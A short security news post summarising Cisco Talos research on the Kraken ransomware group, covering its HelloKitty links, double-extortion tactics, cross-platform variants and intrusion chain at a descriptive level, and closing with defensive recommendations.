Kraken Ransomware Strikes: A New Global Cyber Threat

In August 2025, security researchers at Cisco Talos identified a new and aggressive ransomware-actor known as the Kraken ransomware group, which appears to have arisen from the remains of the HelloKitty ransomware cartel. Cisco Talos Blog According to initial reports, Kraken uses large-scale “big-game hunting” techniques and double-extortion tactics, striking organisations across diverse sectors and international borders. Cisco Talos Blog

Additional commentary and technical breakdowns are also available via a recent post on InfiniteSec’s blog.

Who is Kraken?

Kraken emerged in early 2025 and is a multi-platform ransomware actor that doesn’t limit itself to a single industry or geography. Victims span the United States, United Kingdom, Canada, Denmark, Panama, and Kuwait. Cisco Talos Blog

The group utilises a data-leak site for double-extortion: if victims refuse to pay, their stolen data is published publicly. Cisco Talos Blog

Technical Profile & Attack Chain

In one observed intrusion, the attackers exploited an exposed SMB vulnerability to gain access. They then used tools such as Cloudflared for persistence and SSHFS for data exfiltration prior to encryption. Cisco Talos Blog

Kraken supports Windows, Linux, and VMware ESXi environments — a we scope for a single actor. Cisco Talos Blog

Notably, the ransomware engine benchmarks the victim system’s performance to determine the optimal encryption strategy—an advanced step rarely seen in typical ransomware operations. Cisco Talos Blog

Windows, Linux & ESXi Variants

The Windows build of Kraken (32-bit C++) includes anti-analysis features, disables WoW64 file-redirection, escalates privileges for file encryption, and excludes system folders to keep the machine alive long enough for negotiations. Cisco Talos Blog

Its Linux/ESXi variant (64-bit C++) likewise adapts to the platform, terminates virtual machines, and self-cleans via an embedded “bye_bye.sh” script to erase traces. Cisco Talos Blog

Link to HelloKitty & Underground Forum

Analysts believe Kraken is connected to HelloKitty or has inherited its operators—evidence includes reuse of the ransom-note filename, references to HelloKitty in the data-leak site, and the launch of a new underground forum dubbed “The Last Haven Board.” Cisco Talos Blog

What You Should Be Doing

• Monitor for indicators of compromise (IOCs) tied to Kraken. Cisco Talos Blog
• Harden SMB exposure, apply patches, and enforce multi-factor authentication.
• Segment networks, restrict access to VMs, and monitor lateral movement (particularly latent tunnels via Cloudflared, SSHFS).
• Consider that an encryption event may be preceded by data exfiltration—plan for detection and response accordingly.
• Refer to both Talos’s detailed technical write-up and further analysis on InfiniteSec for extended context and practical IOCs.

Sources:

• Talos Intelligence Blog: “Unleashing the Kraken ransomware group” (Cisco Talos) Cisco Talos Blog